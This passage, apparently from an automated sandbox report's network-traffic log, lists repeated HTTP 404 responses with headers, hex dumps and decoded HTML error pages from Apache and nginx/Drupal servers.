65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Apr 2023 13:04:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Apr 2023 13:04:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Apr 2023 13:04:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Apr 2023 13:04:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Apr 2023 13:05:50 GMTContent-Type: text/html; charset=UTF-8X-Drupal-Cache: MISSExpires: Sun, 19 Nov 1978 05:00:00 GMTX-Content-Type-Options: nosniffX-Request-ID: v-eb409396-d544-11ed-a2c8-9b1543701bb2X-AH-Environment: prodCache-Control: max-age=900, publicAge: 0Via: varnishX-Cache: MISSTransfer-Encoding: chunkedConnection: closeData Raw: 30 30 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 2b 52 44 46 61 20 31 2e 30 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 4d 61 72 6b 55 70 2f 44 54 44 2f 78 68 74 6d 6c 2d 72 64 66 61 2d 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 64 34 34 32 62 63 36 61 33 35 30 36 37 34 65 35 61 62 62 22 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 44 3a 22 35 38 34 34 35 31 31 39 38 22 7d 3b 3b 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 2c 72 3d 7b 38 37 36 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 54 3a 28 29 3d 3e 6e 2c 70 3a 28 29 3d 3e 69 7d 29 3b 63 6f 6e 73 74 20 6e 3d 2f 28 69 50 61 64 7c 69 50 68 6f 6e 65 7c 69 50 6f 64 29 2f 67 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 2c 69 3d 6e 26 26 42 6f 6f 6c 65 61 6e 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 53 68 61 72 65 64 57 6f 72 6b 65 72 29 7d 2c 36 35 36 32 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 50 5f 3a 28 29 3d 3e 76 2c 4d 74 3a 28 29 3d 3e 70 2c 43 35 3a 28 29 3d 3e 64 2c 44 4c 3a 28 29 3d 3e 77 2c 4f 50 3a 28 29 3d 3e 52 2c 6c 46 3a 28 29 3d 3e 7a 2c 59 75 3a 28 29 3d 3e 41 2c 44 67 3a 28 29 3d 3e 68 2c 43 58 3a 28 29 3d 3e 66 2c 47 45 3a 28 29 3d 3e 79 2c 73 55 3a 28 29 3d 3e 4d 7d 29 3b 76 61 72 20 6e 3d 7b 7d 3b 72 2e 72 28 6e 29 2c 72 2e 64 28 6e 2c 7b 61 67 65 6e 74 3a 28 29 3d 3e 78 2c 6d 61 74 63 68 3a 28 29 3d 3e 6b 2c 76 65 72 73 69 6f 6e 3a 28 29 3d 3e 6a 7d 29 3b 76 61 72 20 69 3d 72 28 36 37 39 37 29 2c 6f 3d 72 28 39 30 39 29 2c 61 3d 72 28 38 36 31 30 29 3b 63 6c 61 73 73 20 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 29 7b 74 72 79 7b 69 66 28 21 65 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 28 30 2c 61 2e 5a 29 28 22 4e 65 77 20 73 65 74 74 69 6e 67 20 61 20 4
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Apr 2023 13:05:52 GMTContent-Type: text/html; charset=UTF-8X-Drupal-Cache: MISSExpires: Sun, 19 Nov 1978 05:00:00 GMTX-Content-Type-Options: nosniffX-Request-ID: v-ecd799fc-d544-11ed-98ba-d7dc276d6fefX-AH-Environment: prodCache-Control: max-age=900, publicAge: 0Via: varnishX-Cache: MISSTransfer-Encoding: chunkedConnection: closeData Raw: 30 30 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 2b 52 44 46 61 20 31 2e 30 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 4d 61 72 6b 55 70 2f 44 54 44 2f 78 68 74 6d 6c 2d 72 64 66 61 2d 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 64 34 34 32 62 63 36 61 33 35 30 36 37 34 65 35 61 62 62 22 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 44 3a 22 35 38 34 34 35 31 31 39 38 22 7d 3b 3b 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 2c 72 3d 7b 38 37 36 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 54 3a 28 29 3d 3e 6e 2c 70 3a 28 29 3d 3e 69 7d 29 3b 63 6f 6e 73 74 20 6e 3d 2f 28 69 50 61 64 7c 69 50 68 6f 6e 65 7c 69 50 6f 64 29 2f 67 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 2c 69 3d 6e 26 26 42 6f 6f 6c 65 61 6e 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 53 68 61 72 65 64 57 6f 72 6b 65 72 29 7d 2c 36 35 36 32 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 50 5f 3a 28 29 3d 3e 76 2c 4d 74 3a 28 29 3d 3e 70 2c 43 35 3a 28 29 3d 3e 64 2c 44 4c 3a 28 29 3d 3e 77 2c 4f 50 3a 28 29 3d 3e 52 2c 6c 46 3a 28 29 3d 3e 7a 2c 59 75 3a 28 29 3d 3e 41 2c 44 67 3a 28 29 3d 3e 68 2c 43 58 3a 28 29 3d 3e 66 2c 47 45 3a 28 29 3d 3e 79 2c 73 55 3a 28 29 3d 3e 4d 7d 29 3b 76 61 72 20 6e 3d 7b 7d 3b 72 2e 72 28 6e 29 2c 72 2e 64 28 6e 2c 7b 61 67 65 6e 74 3a 28 29 3d 3e 78 2c 6d 61 74 63 68 3a 28 29 3d 3e 6b 2c 76 65 72 73 69 6f 6e 3a 28 29 3d 3e 6a 7d 29 3b 76 61 72 20 69 3d 72 28 36 37 39 37 29 2c 6f 3d 72 28 39 30 39 29 2c 61 3d 72 28 38 36 31 30 29 3b 63 6c 61 73 73 20 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 29 7b 74 72 79 7b 69 66 28 21 65 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 28 30 2c 61 2e 5a 29 28 22 4e 65 77 20 73 65 74 74 69 6e 67 20 61 20 4
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Apr 2023 13:05:55 GMTContent-Type: text/html; charset=UTF-8X-Drupal-Cache: MISSExpires: Sun, 19 Nov 1978 05:00:00 GMTX-Content-Type-Options: nosniffX-Request-ID: v-ee6d028e-d544-11ed-8110-6f0c6e595f11X-AH-Environment: prodCache-Control: max-age=900, publicAge: 0Via: varnishX-Cache: MISSTransfer-Encoding: chunkedConnection: closeData Raw: 30 30 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 2b 52 44 46 61 20 31 2e 30 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 4d 61 72 6b 55 70 2f 44 54 44 2f 78 68 74 6d 6c 2d 72 64 66 61 2d 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 64 34 34 32 62 63 36 61 33 35 30 36 37 34 65 35 61 62 62 22 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 44 3a 22 35 38 34 34 35 31 31 39 38 22 7d 3b 3b 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 2c 72 3d 7b 38 37 36 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 54 3a 28 29 3d 3e 6e 2c 70 3a 28 29 3d 3e 69 7d 29 3b 63 6f 6e 73 74 20 6e 3d 2f 28 69 50 61 64 7c 69 50 68 6f 6e 65 7c 69 50 6f 64 29 2f 67 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 2c 69 3d 6e 26 26 42 6f 6f 6c 65 61 6e 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 53 68 61 72 65 64 57 6f 72 6b 65 72 29 7d 2c 36 35 36 32 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 50 5f 3a 28 29 3d 3e 76 2c 4d 74 3a 28 29 3d 3e 70 2c 43 35 3a 28 29 3d 3e 64 2c 44 4c 3a 28 29 3d 3e 77 2c 4f 50 3a 28 29 3d 3e 52 2c 6c 46 3a 28 29 3d 3e 7a 2c 59 75 3a 28 29 3d 3e 41 2c 44 67 3a 28 29 3d 3e 68 2c 43 58 3a 28 29 3d 3e 66 2c 47 45 3a 28 29 3d 3e 79 2c 73 55 3a 28 29 3d 3e 4d 7d 29 3b 76 61 72 20 6e 3d 7b 7d 3b 72 2e 72 28 6e 29 2c 72 2e 64 28 6e 2c 7b 61 67 65 6e 74 3a 28 29 3d 3e 78 2c 6d 61 74 63 68 3a 28 29 3d 3e 6b 2c 76 65 72 73 69 6f 6e 3a 28 29 3d 3e 6a 7d 29 3b 76 61 72 20 69 3d 72 28 36 37 39 37 29 2c 6f 3d 72 28 39 30 39 29 2c 61 3d 72 28 38 36 31 30 29 3b 63 6c 61 73 73 20 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 29 7b 74 72 79 7b 69 66 28 21 65 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 28 30 2c 61 2e 5a 29 28 22 4e 65 77 20 73 65 74 74 69 6e 67 20 61 20 4
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Apr 2023 13:05:58 GMTContent-Type: text/html; charset=UTF-8X-Drupal-Cache: MISSExpires: Sun, 19 Nov 1978 05:00:00 GMTX-Content-Type-Options: nosniffX-Request-ID: v-f001fa1e-d544-11ed-8770-433bb7c11dddX-AH-Environment: prodCache-Control: max-age=900, publicAge: 0Via: varnishX-Cache: MISSTransfer-Encoding: chunkedConnection: closeData Raw: 30 30 35 35 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 2b 52 44 46 61 20 31 2e 30 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 4d 61 72 6b 55 70 2f 44 54 44 2f 78 68 74 6d 6c 2d 72 64 66 61 2d 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 64 34 34 32 62 63 36 61 33 35 30 36 37 34 65 35 61 62 62 22 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 44 3a 22 35 38 34 34 35 31 31 39 38 22 7d 3b 3b 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 2c 72 3d 7b 38 37 36 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 54 3a 28 29 3d 3e 6e 2c 70 3a 28 29 3d 3e 69 7d 29 3b 63 6f 6e 73 74 20 6e 3d 2f 28 69 50 61 64 7c 69 50 68 6f 6e 65 7c 69 50 6f 64 29 2f 67 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 2c 69 3d 6e 26 26 42 6f 6f 6c 65 61 6e 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 53 68 61 72 65 64 57 6f 72 6b 65 72 29 7d 2c 36 35 36 32 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 50 5f 3a 28 29 3d 3e 76 2c 4d 74 3a 28 29 3d 3e 70 2c 43 35 3a 28 29 3d 3e 64 2c 44 4c 3a 28 29 3d 3e 77 2c 4f 50 3a 28 29 3d 3e 52 2c 6c 46 3a 28 29 3d 3e 7a 2c 59 75 3a 28 29 3d 3e 41 2c 44 67 3a 28 29 3d 3e 68 2c 43 58 3a 28 29 3d 3e 66 2c 47 45 3a 28 29 3d 3e 79 2c 73 55 3a 28 29 3d 3e 4d 7d 29 3b 76 61 72 20 6e 3d 7b 7d 3b 72 2e 72 28 6e 29 2c 72 2e 64 28 6e 2c 7b 61 67 65 6e 74 3a 28 29 3d 3e 78 2c 6d 61 74 63 68 3a 28 29 3d 3e 6b 2c 76 65 72 73 69 6f 6e 3a 28 29 3d 3e 6a 7d 29 3b 76 61 72 20 69 3d 72 28 36 37 39 37 29 2c 6f 3d 72 28 39 30 39 29 2c 61 3d 72 28 38 36 31 30 29 3b 63 6c 61 73 73 20 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 29 7b 74 72 79 7b 69 66 28 21 65 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 28 30 2c 61 2e 5a 29 28 22 4e 65 77 20 73 65 74 74 69 6e 67 20 61 20 4
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Apr 2023 13:08:29 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6d 61 72 74 61 62 6f 76 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 